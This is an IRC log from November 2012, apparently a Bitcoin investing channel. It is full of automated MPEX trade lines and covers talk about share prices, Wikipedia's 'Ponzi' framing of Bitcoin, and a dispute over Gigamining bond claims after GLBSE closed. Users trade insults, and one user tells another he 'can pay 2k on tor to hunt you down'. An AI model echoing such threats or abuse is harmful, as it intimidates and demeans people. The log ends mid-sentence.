@ 0.00050348 = 13.6242 BTC [+] Nov 23 18:52:57 [MPEX] [S.MPOE] 16300 @ 0.00049896 = 8.133 BTC [-] Nov 23 18:54:09 can someone take a look at my first paragraph here http://blog.smickles.com/bitcoin/the-ponzi-of-wikipedia-and-bitcoin/#comment-12 and tell me if i'm making sense, if I am, i will bring it to the discussion in the bitcoin wikipedia page Nov 23 18:55:15 I think part of the problem is that we’re looking at it from two different viewpoints. I’m looking for what’s going to help the Wikipedia article, and others are looking for what’s going to help the subject itself, Bitcoin. Nov 23 18:55:17 fuckwit Nov 23 18:55:34 these idiots think this little trick of framing the discussion is such pure unadulterated genius Nov 23 18:55:48 uh-oh, make way for the wikiretard framing the discussion team. Nov 23 18:56:15 heh, so true Nov 23 18:56:42 #1 reason nobody of any worth bothers with that spamsite. Nov 23 18:59:59 [MPEX] [S.MPOE] 682 @ 0.00049896 = 0.3403 BTC [-] Nov 23 19:00:00 [MPEX] [S.MPOE] 7118 @ 0.00049509 = 3.5241 BTC [-] Nov 23 19:02:05 [MPEX] [S.MPOE] 31258 @ 0.00050348 = 15.7378 BTC [+] Nov 23 19:05:51 [MPEX] [S.MPOE] 26950 @ 0.00049961 = 13.4645 BTC [-] Nov 23 19:05:51 [MPEX] [S.MPOE] 7250 @ 0.00050348 = 3.6502 BTC [+] Nov 23 19:09:54 [MPEX] [S.MPOE] 940 @ 0.00050348 = 0.4733 BTC [+] Nov 23 19:09:55 [MPEX] [S.MPOE] 53200 @ 0.00050712 = 26.9788 BTC [+] Nov 23 19:09:56 [MPEX] [S.MPOE] 6010 @ 0.00051358 = 3.0866 BTC [+] Nov 23 19:17:08 http://imgur.com/r/WTF/crUO4 Nov 23 19:21:10 lol kickass Nov 23 19:21:20 makes sense to me Nov 23 19:22:15 [MPEX] [S.MPOE] 12450 @ 0.00051358 = 6.3941 BTC [+] Nov 23 19:22:35 reminds me of the limits of control Nov 23 19:38:02 [MPEX] [S.MPOE] 17600 @ 0.00049755 = 8.7569 BTC [-] Nov 23 19:58:05 [MPEX] [S.MPOE] 9200 @ 0.00050587 = 4.654 BTC [+] Nov 23 19:58:06 [MPEX] [S.MPOE] 468 @ 0.00049755 = 0.2329 BTC [-] Nov 23 20:01:28 so who was saying i'm in for a loads of pressure from the sec ? Nov 23 20:01:30 http://www.rollingstone.com/politics/blogs/taibblog/sec-rocked-by-lurid-sex-and-corruption-lawsuit-20121119 Nov 23 20:01:35 seems MORE LIKE THE OTHER WAY AROUND Nov 23 20:01:39 har har. Nov 23 20:03:09 ha ha Nov 23 20:07:43 [MPEX] [S.MPOE] 38395 @ 0.00050608 = 19.4309 BTC [+] Nov 23 20:28:38 <@rg> but im going to go ahead and merge bitvps >> my new job << what does this mean for s.bvps shareholders? Will they be bought out? Nov 23 20:28:53 mircea_popescu: ^ from #bitvps Nov 23 20:29:16 um Nov 23 20:29:31 well will they ? Nov 23 20:29:44 I just asked it Nov 23 20:30:16 rg was last active there at 5:35 utc (it's now 18:30) Nov 23 20:31:11 [MPEX] [S.MPOE] 33850 @ 0.00049759 = 16.8434 BTC [-] Nov 23 20:31:13 [MPEX] [S.MPOE] 11582 @ 0.00049755 = 5.7626 BTC [-] Nov 23 20:31:14 [MPEX] [S.MPOE] 13618 @ 0.00049669 = 6.7639 BTC [-] Nov 23 20:35:22 > to think that only a few short months away everyone was pissing their pants thinking of the sec. Nov 23 20:35:26 "typical KickStarter deals won’t naturally transfer to equity crowdfunding and the vast majority of startup founders won’t receive any help at all from the JOBS Act" Nov 23 20:35:33 http://www.cringely.com/2012/11/17/jobs-act-crowdfunding-is-unlikely-to-help-most-startups Nov 23 20:36:27 i.e., lots of need for these, as we decide technology can enable what the law won't. Nov 23 20:37:15 [MPEX] [S.MPOE] 33082 @ 0.00049669 = 16.4315 BTC [-] Nov 23 20:37:17 [MPEX] [S.MPOE] 19545 @ 0.00049509 = 9.6765 BTC [-] Nov 23 20:39:36 [MPEX] [S.MPOE] 5155 @ 0.00049768 = 2.5655 BTC [+] Nov 23 20:39:37 [MPEX] [S.MPOE] 6674 @ 0.00050072 = 3.3418 BTC [+] Nov 23 20:49:22 [MPEX] [S.MPOE] 32600 @ 0.00049509 = 16.1399 BTC [-] Nov 23 21:02:17 sgornick there's some huge problems with funding start-ups via btc however. Nov 23 21:02:35 btc being able to help is by no means a foregone conclusion Nov 23 21:07:58 [MPEX] [S.MPOE] 11600 @ 0.00049628 = 5.7568 BTC [+] Nov 23 21:11:42 [MPEX] [S.MPOE] 13500 @ 0.00049954 = 6.7438 BTC [+] Nov 23 21:16:41 [MPEX] [S.MPOE] 17230 @ 0.00049932 = 8.6033 BTC [-] Nov 23 21:20:34 smickles : "There were no "suspicious" motives involved here. I would have gladly thrown in MPEX had I remembered that it has BTC options available. That's it. I just overlooked you. I'm sorry. (And by the way it's fixed now)" Nov 23 21:21:48 [MPEX] [S.MPOE] 10950 @ 0.00049954 = 5.47 BTC [+] Nov 23 21:21:50 [MPEX] [S.MPOE] 11350 @ 0.00050072 = 5.6832 BTC [+] Nov 23 21:23:58 mircea_popescu: heh, yeah. a part of me responded with BS, and another part wanted to respond with "well, I put it that way because it was just a little sensational" Nov 23 21:24:02 your blogger career is starting pretty good if mag journalists are already apologizing to you Nov 23 21:24:07 most bloggers had to wait years. Nov 23 21:24:40 anyway, i think someone sorta-competent bought a chunk of bitfinex interest or some sort of deal Nov 23 21:24:47 cause there's a sudden change in how they run, so. Nov 23 21:26:40 according to my log, i started with about 100 'unique' visitors, and it has been doubling every day since Nov 23 21:27:06 gigavps << scammer tag request @ theymos Nov 23 21:27:15 hahaha wd. Nov 23 21:27:29 yuuuuuuuuuuuuuup Nov 23 21:27:46 F him, he is a fussy P Nov 23 21:28:06 no lawyers.... just pay up dude Nov 23 21:28:50 if the trend holds, in a month, the entire planet should be reading my blog Nov 23 21:28:55 he is even worse than nefario Nov 23 21:29:08 < PsychoticBoy> gigavps << scammer tag request @ theymos Nov 23 21:29:12 where :) Nov 23 21:29:32 [MPEX] [S.MPOE] 5770 @ 0.00049932 = 2.8811 BTC [-] Nov 23 21:29:33 [MPEX] [S.MPOE] 49761 @ 0.00049509 = 24.6362 BTC [-] Nov 23 21:29:44 PM and as soon as he does nothing, public Nov 23 21:29:54 PsychoticBoy: that seems a bit extreme Nov 23 21:29:57 :o Nov 23 21:30:13 not extreme, a lawyer taking over<< thats extreme Nov 23 21:30:32 So if YABMC were to follow a similar claims process then I egt a scammer tag too ;) Nov 23 21:30:57 bad joke... Nov 23 21:31:01 He fed himself with my btc so now its time to pay Nov 23 21:31:44 yep, just pay up maybe even liquidate Nov 23 21:32:10 I have 300btc in yabmc and more than 500 btc in Giga Nov 23 21:32:56 He got the shareholders info so.... he can pay us Nov 23 21:33:24 Thats what I would do, PAY MY DEBT Nov 23 21:34:04 giga`s lawyer does not need my ID to pay me back so whats the point Nov 23 21:34:57 before asking a scammer tag i n public, I will make a thread in the staff forum and let the staff vote Nov 23 21:36:10 heh, a legal scam Nov 23 21:36:52 thats what i think, He covers his ass and does not pay shit, << scammer action Nov 23 21:37:43 hahah http://www.soundclick.com/player/single_player.cfm?songid=243091&q=hi&newref=1 Nov 23 21:37:48 that is fucking gold Nov 23 21:38:05 [MPEX] [S.MPOE] 23000 @ 0.00050072 = 11.5166 BTC [+] Nov 23 21:38:46 lol major laugh Nov 23 21:39:45 giga is ripping ppl off Nov 23 21:40:09 hmmmnz should not be long till someone hires a hitman on tor Nov 23 21:40:47 2K btc for hitman: Yuuuuuuuuuuup Nov 23 21:41:33 this kinda scamming action makes my blood boil Nov 23 21:41:40 clearly Nov 23 21:41:57 lol@that misterbigg guy Nov 23 21:42:29 "What I don't understand is why S.DICE is going to IPO on this penny-ante exchange instead of GLBSE. I think that Mr. E.V.'s ideological fetishes might be putting the business sensibilities in the back seat. Which is dangerous for investors." Nov 23 21:43:18 Still hoping Gigavps will make up his mind and just pay divs and final buyback to our addresses Nov 23 21:48:23 smickles teh funs of history. Nov 23 21:48:29 btc is worth it just for that Nov 23 21:50:50 [MPEX] [S.MPOE] 24370 @ 0.00049509 = 12.0653 BTC [-] Nov 23 21:50:52 [MPEX] [S.MPOE] 6268 @ 0.00049502 = 3.1028 BTC [-] Nov 23 21:51:01 !ticker s.dice Nov 23 21:51:02 [MPEX:S.DICE] 1day: 0.00309664 / 0.00323838 / 0.00339944 (33993 shares, 110.08 BTC), 30day: 0.00180002 / 0.00332148 / 0.0034 (903448 shares, 3,000.79 BTC) Nov 23 21:51:28 it hit .0034 in the past 30 days, eh? Nov 23 21:51:40 that may happen again soon Nov 23 21:52:51 3399 is not so far off anyway Nov 23 21:52:57 it almost hit it today in that sense Nov 23 21:53:23 PsychoticBoy i'll bet you a btc he won't. Nov 23 21:54:04 I think so too mircea Nov 23 21:54:14 but hope... Nov 23 21:54:38 yeah Nov 23 22:01:23 [MPEX] [S.MPOE] 22600 @ 0.00049602 = 11.2101 BTC [+] Nov 23 22:01:25 [MPEX] [S.MPOE] 17200 @ 0.00049745 = 8.5561 BTC [+] Nov 23 22:01:26 [MPEX] [S.MPOE] 3570 @ 0.00050072 = 1.7876 BTC [+] Nov 23 22:03:29 [MPEX] [S.MPOE] 1432 @ 0.00049502 = 0.7089 BTC [-] Nov 23 22:03:31 [MPEX] [S.MPOE] 6198 @ 0.00049467 = 3.066 BTC [-] Nov 23 22:04:38 there is a funny aspect of the entire glbse thing. the mylawyr people specialise in : Nov 23 22:04:44 Drug Possession Nov 23 22:04:44 Drug Trafficking Nov 23 22:04:44 Marijuana Cultivation Nov 23 22:04:44 DUI Nov 23 22:05:07 i guess there's White Collar Crimes in there too. Nov 23 22:05:36 [MPEX] [S.MPOE] 5242 @ 0.00050072 = 2.6248 BTC [+] Nov 23 22:05:38 [MPEX] [S.MPOE] 14400 @ 0.0005051 = 7.2734 BTC [+] Nov 23 22:09:53 [MPEX] [S.MPOE] 53400 @ 0.00050596 = 27.0183 BTC [+] Nov 23 22:09:55 [MPEX] [S.MPOE] 2400 @ 0.00050625 = 1.215 BTC [+] Nov 23 22:21:18 [MPEX] [S.MPOE] 33500 @ 0.00050625 = 16.9594 BTC [+] Nov 23 22:21:19 [MPEX] [S.MPOE] 3300 @ 0.00050662 = 1.6718 BTC [+] Nov 23 22:23:03 [MPEX] [S.MPOE] 18188 @ 0.00050662 = 9.2144 BTC [+] Nov 23 22:23:05 [MPEX] [S.MPOE] 22550 @ 0.00050852 = 11.4671 BTC [+] Nov 23 22:23:06 [MPEX] [S.MPOE] 5412 @ 0.00051349 = 2.779 BTC [+] Nov 23 22:25:05 [MPEX] [S.MPOE] 28988 @ 0.00051349 = 14.885 BTC [+] Nov 23 22:25:06 [MPEX] [S.MPOE] 28550 @ 0.00051358 = 14.6627 BTC [+] Nov 23 22:25:07 [MPEX] [S.MPOE] 27962 @ 0.00051363 = 14.3621 BTC [+] Nov 23 22:33:41 [MPEX] [S.MPOE] 30700 @ 0.00051278 = 15.7423 BTC [-] Nov 23 22:46:59 [MPEX] [S.MPOE] 9385 @ 0.00050726 = 4.7606 BTC [-] Nov 23 22:51:46 [MPEX] [S.MPOE] 1644 @ 0.00050542 = 0.8309 BTC [-] Nov 23 22:51:47 [MPEX] [S.MPOE] 16806 @ 0.0005025 = 8.445 BTC [-] Nov 23 22:52:03 GLBSE'D Definition: You invest coins in a bitcoin project and that project uses your coins to hire a lawyer who proceeds to use legal avenues to make it practically impossible you will get your bitcoins back. Nov 23 22:52:13 pity the glbbq name is too long and so it'll never take Nov 23 22:54:45 heh Nov 23 22:58:49 I'm moving RSM to - https://btct.co - they email the asset issuer a full shareholders list every twelve hours. So no problem if the exchange ever goes dark. There based in Belize and have a lawyer. Nov 23 22:59:27 what happens if you lose the email box/someone jacks it ? Nov 23 23:02:05 I use Gmail with a very secure password. Nov 23 23:02:18 no 2fa? Nov 23 23:02:24 [MPEX] [S.MPOE] 15869 @ 0.0005031 = 7.9837 BTC [+] Nov 23 23:02:43 Update on the S.DICE month >> http://blog.smickles.com/bitcoin/bitcoin-finance/a-good-month-for-s-dice-shareholders-in-the-making/?preview=true&preview_id=46&preview_nonce=ddeb71c330#update_23nov12 Nov 23 23:03:58 smickles what's the figure ? Nov 23 23:04:39 matthewh3 smpt is plaintext and trivial to sniff. Nov 23 23:05:23 [MPEX] [S.MPOE] 7865 @ 0.00050726 = 3.9896 BTC [+] Nov 23 23:05:24 [MPEX] [S.MPOE] 9735 @ 0.00051153 = 4.9797 BTC [+] Nov 23 23:06:07 but when I log-in its HTTPS so my password is safe. Nov 23 23:06:55 that part is true. Nov 23 23:07:02 "the only thing that comes up for "Christmas" on bitmit is a Canadian silver coin." Nov 23 23:07:09 jesus fuck, what is the point of making a black friday event Nov 23 23:07:21 if then xmas is going to plow right into your nude ass ? Nov 23 23:07:22 plus I'd only ever use a Windoze PC that is locked down like in a library. Nov 23 23:07:34 who did this! has to be fired! Nov 23 23:07:44 good afternoon Nov 23 23:07:59 heya. Nov 23 23:08:11 PsychoticBoy if you would like to say things about me, say them when I'm here Nov 23 23:08:19 mircea_popescu: 0.9435613% Nov 23 23:08:32 smickles aww going down!1 Nov 23 23:08:48 up from the previous ~.8% tho Nov 23 23:09:01 and ~.6% before that Nov 23 23:09:18 some guy doing a martingale got lucky, then lost it Nov 23 23:09:28 he was braggin' about it too Nov 23 23:09:39 (but is silent nao) Nov 23 23:09:57 lol Nov 23 23:10:03 gambler's silence Nov 23 23:10:14 gamblers only talk when they win Nov 23 23:10:19 funny thing too: Nov 23 23:10:25 ya but they talk loud enough then for both cases. Nov 23 23:10:40 he hawa all coy, like, "i won't tell you how I was betting" Nov 23 23:11:01 then dooglas posted a tx log, and was liek " 'tis you bro" Nov 23 23:11:34 lol Nov 23 23:11:49 Nice thing, that blockchain Nov 23 23:13:54 [MPEX] [S.MPOE] 38652 @ 0.00051153 = 19.7717 BTC [+] Nov 23 23:16:56 so, it has come to this http://www.encyclopediabitcoinica.com/wiki/GIGAMINING Nov 23 23:17:49 [MPEX] [S.MPOE] 7631 @ 0.0005031 = 3.8392 BTC [-] Nov 23 23:17:50 [MPEX] [S.MPOE] 9794 @ 0.0005025 = 4.9215 BTC [-] Nov 23 23:17:51 [MPEX] [S.MPOE] 20375 @ 0.00049745 = 10.1355 BTC [-] Nov 23 23:28:17 http://live.coinbr.com/?mpsic=S.MPOE Nov 23 23:28:24 i wonder if that could work as an entropy source Nov 23 23:33:49 [MPEX] [S.MPOE] 2925 @ 0.00049745 = 1.455 BTC [-] Nov 23 23:33:51 [MPEX] [S.MPOE] 18100 @ 0.00049679 = 8.9919 BTC [-] Nov 23 23:33:52 [MPEX] [S.MPOE] 375 @ 0.00049566 = 0.1859 BTC [-] Nov 23 23:35:36 gigavps, should I copy paste all I said Nov 23 23:36:27 You re up for scammer tag, since you have shareholders data and thus are able to pay up Nov 23 23:37:04 and after that you probably see the same future as trendon shavers Nov 23 23:37:12 hunted Nov 23 23:37:21 lol Nov 23 23:37:27 come and get me Nov 23 23:37:42 i am trying to pay people legally Nov 23 23:37:43 so best thing is to just pay to the addresses in the info you got from glbse Nov 23 23:38:09 thanks for the advice Nov 23 23:38:27 yes and obtained most funds from illigal activities Nov 23 23:38:32 stealing atm Nov 23 23:38:42 glbse wasnt sober either Nov 23 23:38:50 i'm sorry you feel this way Nov 23 23:39:19 no you are tricking ppl with your unsigned lawyer note Nov 23 23:39:49 I can pay 2k on tor to hunt you down but I wont Nov 23 23:40:37 I wait till you get back to your senses and pay just like its meant to be Nov 23 23:40:47 [MPEX] [S.MPOE] 7330 @ 0.00050282 = 3.6857 BTC [+] Nov 23 23:41:54 at this point no one in the right mind would do all 6 points mentiont in the mail Nov 23 23:42:08 why not? Nov 23 23:42:11 probably point 6 is impossible so there you go Nov 23 23:42:30 why is it impossible? Nov 23 23:42:58 should be pretty easy to write a note that said you own the bonds and the bitcoin addy Nov 23 23:43:04 and have it notoried Nov 23 23:43:33 inb4 scan and email Nov 23 23:43:57 because it requires notoried, would cost you lots of euro`s Nov 23 23:44:08 no one would do that Nov 23 23:44:13 and you know it Nov 23 23:44:19 well, that is your assumption Nov 23 23:44:25 wow, notorizing is expensive in europe? Nov 23 23:44:26 so made my point Nov 23 23:44:31 many people have already submitted the info Nov 23 23:44:36 it's cheap to free in 'merica Nov 23 23:44:57 i know a few accountants who offer it at no charge Nov 23 23:45:23 [MPEX] [S.MPOE] 4920 @ 0.00050282 = 2.4739 BTC [+] Nov 23 23:45:25 [MPEX] [S.MPOE] 25580 @ 0.00050703 = 12.9698 BTC [+] Nov 23 23:45:32 PsychoticBoy tbe only person keeping you from making the claim is you Nov 23 23:45:50 I will let the staff of bitcointalk vote for you to be marked as scammer before making a public scammer tag request, cause these requirements make no sense at all Nov 23 23:46:32 I did not need an ID to buy from you so I wont need it now Nov 23 23:46:59 so you took my money and now walks unless..... strange Nov 23 23:47:08 heh, tell that to mtgox when you hit their aml limits Nov 23 23:47:35 hello internet Nov 23 23:47:40 how are you today? Nov 23 23:47:45 phamtastic Nov 23 23:47:51 super neat Nov 23 23:49:11 gigavpa i owned like over 9000 gigamining bonds Nov 23 23:49:16 can i tera-mine yet? Nov 23 23:51:12 gotta run, bbiab Nov 23 23:51:27 scammy fuck leaves again Nov 23 23:52:25 i doubt gigavps is scammy Nov 23 23:52:30 but what do i know Nov 23 23:54:19 I am almost at the point to invest another 2k btc in giga Nov 23 23:54:33 but only not in his bonds Nov 23 23:54:37 ;) Nov 24 00:02:05 [MPEX] [S.MPOE] 4820 @ 0.00050703 = 2.4439 BTC [+] Nov 24 00:02:07 [MPEX] [S.MPOE] 21280 @ 0.00051153 = 10.8854 BTC [+] Nov 24 00:06:12 http://www.encyclopediabitcoinica.com/wiki/GIGAMINING Nov 24 00:09:03 "I wrote earlier “That characteristic being that early adopters are benifited greater than the latecomers. But this can be said of any appreciating asset.” in reference to the only submitted evidence for Bitcoin being anything near a ponzi scheme in the statements citations. Nov 24 00:09:08 If it can be said about any appreciating asset, how is it noteworthy?" Nov 24 00:10:41 "And how do you expect anyone to find a reliable source pointing this out about the vast majority of appreciating assets?" Nov 24 00:11:05 [MPEX] [S.MPOE] 15250 @ 0.00049846 = 7.6015 BTC [-] Nov 24 00:11:09 srsly Nov 24 00:11:42 http://trilema.com/2012/what-are-the-bitcoin-market-drivers/ Nov 24 00:11:45 if anyone is curious Nov 24 00:12:18 SudoGhost (as expected) ignoring the point of my comment Nov 24 00:13:35 smickles i'd guess it's anywhere from free to 50 or so euros here Nov 24 00:14:15 to notarize? Nov 24 00:14:59 50 euro must get you a hight quality stamp impression from the notary Nov 24 00:15:02 yep Nov 24 00:15:07 one of those hologram things Nov 24 00:15:14 nifty Nov 24 00:16:01 I can't imagine this giga issue would require anything above the 'inked rubber stamp' variety tho Nov 24 00:16:42 yeah. Nov 24 00:16:49 still, if you own < 5 bonds or so Nov 24 00:18:47 if you only have 5 bonds then the effort to maintain a secure wallet is a higher cost than the value of the bonds Nov 24 00:19:33 i saw someone publish a list Nov 24 00:19:38 > 70% of it was 1 and 2 bonds Nov 24 00:19:48 they were .3 nominal bonds too, not 1.0 like giga's. Nov 24 00:32:40 [MPEX] [S.MPOE] 9550 @ 0.0005091 = 4.8619 BTC [+] Nov 24 00:32:41 [MPEX] [S.MPOE] 25250 @ 0.00050971 = 12.8702 BTC [+] Nov 24 00:34:53 [MPEX] [S.MPOE] 42550 @ 0.00050389 = 21.4405 BTC [-] **** ENDING LOGGING AT Sat Nov 24 00:58:42 2012 **** BEGIN LOGGING AT Sat Nov 24 00:59:07 2012 Nov 24 00:59:31 -NickServ- You failed to identify in time for the nickname mircea_popescu **** ENDING LOGGING AT Sat Nov 24 01:04:29 2012 **** BEGIN LOGGING AT Sat Nov 24 01:05:15 2012 Nov 24 01:07:04 [MPEX] [S.MPOE] 10008 @ 0.00050845 = 5.0886 BTC [-] Nov 24 01:12:05 [MPEX] [S.MPOE] 30200 @ 0.00051318 = 15.498 BTC [+] Nov 24 01:16:27 [MPEX] [S.MPOE] 17342 @ 0.00050962 = 8.8378 BTC [-] Nov 24 01:16:28 [MPEX] [S.MPOE] 4908 @ 0.00050703 = 2.4885 BTC [-] Nov 24 01:16:36 fishgame jumped the shark eh? Nov 24 01:23:22 [MPEX] [S.MPOE] 10498 @ 0.00050703 = 5.3228 BTC [-] Nov 24 01:25:58 lol Nov 24 01:28:17 [MPEX] [S.DICE] 1630 @ 0.00325681 = 5.3086 BTC [+] Nov 24 01:28:19 [MPEX] [S.DICE] 5200 @ 0.00328979 = 17.1069 BTC [+] Nov 24 01:28:20 [MPEX] [S.DICE] 170 @ 0.00334934 = 0.5694 BTC [+] Nov 24 01:28:27 :o Nov 24 01:28:34 so close Nov 24 01:29:07 …to mr voorhees getting more btc 'in his pockt' Nov 24 01:32:56 https://therocktrading.com/en/exchange/stock Nov 24 01:33:02 check out the 24 hour volumes on the right Nov 24 01:33:57 ouch Nov 24 01:34:10 219 btc last year too Nov 24 01:34:35 i wasn't even aware they existed last year. Nov 24 01:34:38 seems improbably Nov 24 01:34:54 it probably is ment as a rolling 365 days Nov 24 01:35:03 improperly labeled Nov 24 01:36:03 [MPEX] [S.MPOE] 12489 @ 0.00050389 = 6.2931 BTC [-] Nov 24 01:36:03 [MPEX] [S.MPOE] 19861 @ 0.00050278 = 9.9857 BTC [-] Nov 24 01:36:09 "While it has been said that the ECB report doesn't deny or disprove that Bitcoin is a Ponzi scheme, it doesn't accuse it of being a Ponzi either. The Reuters source is just a headline (as far as it saying anyone even mentions Ponzi and Bitcoin in the same sentence). Headlines are often written by people other than the article's author for the purpose of attracting eyeballs, not communicating relevant information. The other citation (currently us Nov 24 01:36:11 Born in 2007 as a Second Life insurance company, The Rock has evolved in a full featured virtual financial institution. Based in US, founded by EU citizens, run by long-standing virtual experts. Nov 24 01:36:16 i guess they're mostly linden Nov 24 01:36:32 since 2007, that's decent Nov 24 01:36:53 Based in US, founded by EU citizens, << dam ferriners Nov 24 01:37:02 lol Nov 24 01:40:05 ftr, the entire "blogs are not a source" like of wikipedia, while they take utter junk such as news sites into account... Nov 24 01:40:13 i've never heard of anything more ridiculous. Nov 24 01:40:26 there's no newspaper in the world that can compete with the top blogs. in any respect. Nov 24 01:40:51 yeah, the line should be drawn at quality, not labels Nov 24 01:41:06 [MPEX] [S.DICE] 500 @ 0.00334934 = 1.6747 BTC [+] Nov 24 01:41:08 moreover, the bar should be against old press Nov 24 01:41:24 any newspaper has to do 1.5x more than any blog for the same attention. Nov 24 01:41:28 just because it's not a blog. Nov 24 01:46:50 Eh, so are requirements for claiming Gigamining shares bothering you, Mircea? Nov 24 01:50:56 not particularly Nov 24 01:51:11 oh yeah, are you making the claime for the etf? Nov 24 01:51:29 Glad to know I'm not the only one which doesn't bother. Nov 24 01:51:31 nope. Nov 24 01:51:47 ... Nov 24 01:52:02 Namjies: you expected otherwise? Nov 24 01:53:02 [MPEX] [S.MPOE] 18002 @ 0.00050536 = 9.0975 BTC [+] Nov 24 01:54:27 I am unsure why the claim would not be made. Nov 24 01:55:14 [MPEX] [S.MPOE] 27247 @ 0.00050969 = 13.8875 BTC [+] Nov 24 01:55:16 [MPEX] [S.MPOE] 1487 @ 0.00051318 = 0.7631 BTC [+] Nov 24 01:55:17 [MPEX] [S.MPOE] 14719 @ 0.00051363 = 7.5601 BTC [+] Nov 24 01:55:18 [MPEX] [S.MPOE] 6732 @ 0.00051369 = 3.4582 BTC [+] Nov 24 01:55:21 I have an idea, but at a low confidence interval Nov 24 01:56:04 why it would NOT be made ? Nov 24 01:56:23 we're not in backwards world, we're in straightwards world. why would it be made ? Nov 24 01:57:48 Because you don't write off an account because it requires administrative procedures or otherwise? Who voids funds/value because of procedures? Nov 24 01:58:28 Why would it be made? To recover value which was previously deemed lost Nov 24 01:59:24 the problem here is this : the etf was an instrument to pass along value as conveyed Nov 24 01:59:36 it wasn't an instrument to jump through random hoops and then pass along the value thus obtained. Nov 24 01:59:55 "The Owner will never own less shares of the underlying than the total float of this asset implies." Nov 24 02:00:08 thus, no collect money from investors -> make upgrades Nov 24 02:00:20 no preparation of legal documents and mailing, no other random shit. Nov 24 02:00:25 money received is distributed. Nov 24 02:00:41 Gigavps never discontinued the shares. Nov 24 02:00:52 The etf states "The Owner will never own less shares of the underlying than the total float of this asset implies." Nov 24 02:00:58 the underlying was discontinued on oct 5 Nov 24 02:00:58 well, mircea_popescu never stopped owning the shares then Nov 24 02:01:10 the underlying is gigamining share on glbse Nov 24 02:01:42 GLBSE was discontinued. The contract does not state the shares ahve to be on GLBSE. Nov 24 02:02:20 It simply states 5 mhash/s bonds, which are not discontinued by Gigavps. Nov 24 02:02:44 i don't think you get to randomly create an imaginary vehicle just because the actual vehicle imploded. Nov 24 02:04:08 So if someone assaults you and MPEx servers rendering it incapable to continue operations, all "financial vehicles implodes" and have no value whatsoever? Nov 24 02:04:22 Voiding every shares? Nov 24 02:04:48 depends how contracts are made out, but i'd expect mpex-share derivatives to die there yes Nov 24 02:04:53 [MPEX] [S.MPOE] 50800 @ 0.00051369 = 26.0955 BTC [+] Nov 24 02:05:11 There's a difference between the financial vehicle and it's exchange... an exchange can close or expel a specific stock. Nov 24 02:05:30 well, "an" is inappropriate, and mpex comparison is inappropriate. Nov 24 02:05:33 we;'re dealing with glbse here. Nov 24 02:05:52 You still own the stocks and can claim them. It's just not on the usual exchange anymore. Nov 24 02:05:57 mircea_popescu is a boober Nov 24 02:06:29 Namjies suppose for the sake of argument gigavps simply asked for 1 penny per share registration fee. Nov 24 02:06:41 do you see in that context how i'd just shrug ? Nov 24 02:06:52 The fact GLBSE doesn't deserve the appelation of an exchange because it was so bad doesn't change the fact it worked as such. Nov 24 02:07:14 You can't charge for registration of stock you already own. Nov 24 02:07:18 right. Nov 24 02:07:53 Gigavps simply requires people to identify themselves when claiming their shares. Nov 24 02:08:10 He's not charging anything. Nov 24 02:08:23 There's always paperwork involved when moving off of an exchange. Nov 24 02:09:00 afaik this isn't moving to a new exchange. Nov 24 02:09:35 The ETF contract has no conditional clause that it's execution requires GLBSE to be the platform where the bonds are exchanged or that the bonds must be issued on an exchange for the ETF to be honored. Nov 24 02:10:19 well, it had a (details) clause that included all that. Nov 24 02:11:23 Where? Nov 24 02:12:00 The owner of this ETF holds 900 perpetual 5.0Mh/s bonds (details), Nov 24 02:12:50 Aye... you mean the gigavps thread? Nov 24 02:13:10 It never stated that to be honored, those bonds required GLBSE either. Nov 24 02:13:42 The bonds are off an exchange now. Securities don't have to be on an exchange. Nov 24 02:14:12 well, they in principle don't have to, all things are in principle possible. these, however, were. Nov 24 02:14:48 They were on an exchange, yes. Now they got dropped off of it. Nov 24 02:14:56 They remain legitimate bonds. Nov 24 02:15:17 do you have some sort of statement to this effect ? Nov 24 02:16:08 The issuer is still honoring them. Do you have any statement to the effect Gigavps will not honor them or claimed he won't pay them? Nov 24 02:16:52 Would you like to confirm with GigaVPS that the bonds remain valid? Nov 24 02:17:03 no, the question is, do you have a statement from the issuer of the thing you're discussing saying that the thing you're discussing is going to behave in the manner you're proposing. Nov 24 02:17:25 Paying 5 mhash/s perpetually? Nov 24 02:17:38 no. Nov 24 02:17:50 that in the event glbse goes away the thing still carries as if nothing happened. Nov 24 02:18:47 or that in the event that glbse goes away, issuer will do "anything" or "do X" to obtain private registration Nov 24 02:20:55 What do you think he is doing? He's attributing bonds to each holder to continue honoring their coupons as usual. Nov 24 02:21:07 that's besides the point. Nov 24 02:21:24 Which is? Nov 24 02:21:52 you've made some presupositions which aren't borne by the facts, but would prefer to present these as fact. Nov 24 02:22:03 the best way if unsure is to ask. Nov 24 02:22:30 Well you should ask Gigavps then to verify that. Nov 24 02:22:42 i don't see it has anything to do with gigavps. Nov 24 02:23:15 other, of course, the fact that he's not so far sending money. Nov 24 02:23:27 the way that lawyer letter looked, 'gigamining' was a glbse only thing of another company Nov 24 02:24:46 btw, i'm still waiting on my llc docs :( Nov 24 02:24:59 really, the cost to me to get to the legal bottom of this would easily eat up the value of the etf Nov 24 02:25:11 i guess i could do that, but then i'd have to make shareholders pay the difference somehow. Nov 24 02:25:20 ds!!!!!!!! Nov 24 02:25:20 sdalkf Nov 24 02:25:26 wha ? Nov 24 02:25:55 go here http://starpas.azcc.gov/scripts/cgiip.exe/WService=wsbroker1/connect.p?app=names-report.p search smickles Nov 24 02:26:27 Technically, your ETF doesn't contractually require the shares to be on GLBSE or any exchange. It says "The Owner will never own less shares of the underlying than the total float of this asset implies." No conditional statement. As such if bonds remain valid and your property, you have to claim them. Nov 24 02:26:43 it's 'waiting to be examined' received on the 13th Nov 24 02:26:45 o hey, right under $$$ $AVE WITH CLEAN AZ CARPET CLEANING Nov 24 02:26:55 lol Nov 24 02:27:33 Namjies : i'm not doing affidavits as a proxy for anyone just cause you figure i should. Nov 24 02:27:46 lol, 'smi concepts' and 'smi concepts 2' Nov 24 02:28:02 the practical options are either i spend something which on a rough estimate is about 8k to get the thing thoroughly looked into, Nov 24 02:28:05 or else just shrug. Nov 24 02:28:12 the bonds ain't worth 8k, so i'm shrugging. Nov 24 02:28:39 For anyone? You're the ETF owner who owns the shares. You're not proxying. Nov 24 02:28:46 smickles http://starpas.azcc.gov/scripts/cgiip.exe/WService=wsbroker1/names-detail.p?name-id=L18030781&type=PENDING%20CORP. direct link Nov 24 02:28:56 right. Nov 24 02:29:10 srsly, just because you imagine things a certain way doesn't mean they are a certain way. Nov 24 02:29:30 I can haz file number ? :D Nov 24 02:29:31 I'm not imagining it, it's what the ETF claims. Nov 24 02:30:13 >>The Owner<< will never own less shares of the underlying than the total float of this asset implies. Nov 24 02:30:15 what can i tell you. Nov 24 02:30:37 You're the owner who owns the shares. Nov 24 02:30:55 You still own 